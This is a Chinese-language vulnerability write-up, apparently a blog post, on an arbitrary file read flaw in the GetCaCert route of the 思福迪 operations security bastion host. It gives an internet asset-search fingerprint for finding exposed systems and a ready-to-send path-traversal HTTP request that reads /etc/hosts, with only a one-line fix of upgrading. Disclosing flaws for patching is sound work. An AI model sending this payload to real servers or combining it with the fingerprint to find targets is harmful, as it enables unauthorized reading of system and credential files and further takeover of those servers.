思福迪运维安全管理系统 任意文件读取漏洞

产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机

漏洞概述

由于思福迪运维安全管理系统 GetCaCert路由存在任意文件读取漏洞,攻击者可通过该漏洞在服务器端读取任意文件敏感内容,可能导致攻击者后续获取到相关的服务器权限

资产测绘

banner="Set-Cookie: bhost=" || header="Set-Cookie: bhost="

漏洞复现

lua 复制代码
GET /bhost/GetCaCert?a1=../../../../../etc/hosts HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

base64解码,获取明文内容:

整改建议

升级至安全版本

相关推荐
宁zz5 小时前
乌班图安装jenkins
运维·jenkins
大丈夫立于天地间5 小时前
ISIS协议中的数据库同步
运维·网络·信息与通信
rainFFrain6 小时前
单例模式与线程安全
linux·运维·服务器·vscode·单例模式
币之互联万物7 小时前
AQUA爱克泳池设备入驻济南校园,以品质筑牢游泳教育安全防线
安全
@郭小茶7 小时前
docker-compose方式部署docker项目
运维·docker·容器
自由鬼8 小时前
开源虚拟化管理平台Proxmox VE部署超融合
linux·运维·服务器·开源·虚拟化·pve
Linux运维老纪9 小时前
运维之 Centos7 防火墙(CentOS 7 Firewall for Operations and Maintenance)
linux·安全·centos·云计算·运维开发·火绒
电星托马斯9 小时前
Linux系统CentOS 6.3安装图文详解
linux·运维·服务器·程序人生·centos
啞謎专家9 小时前
CentOS中挂载新盘LVM指南:轻松扩展存储空间,解决磁盘容量不足问题
linux·运维·服务器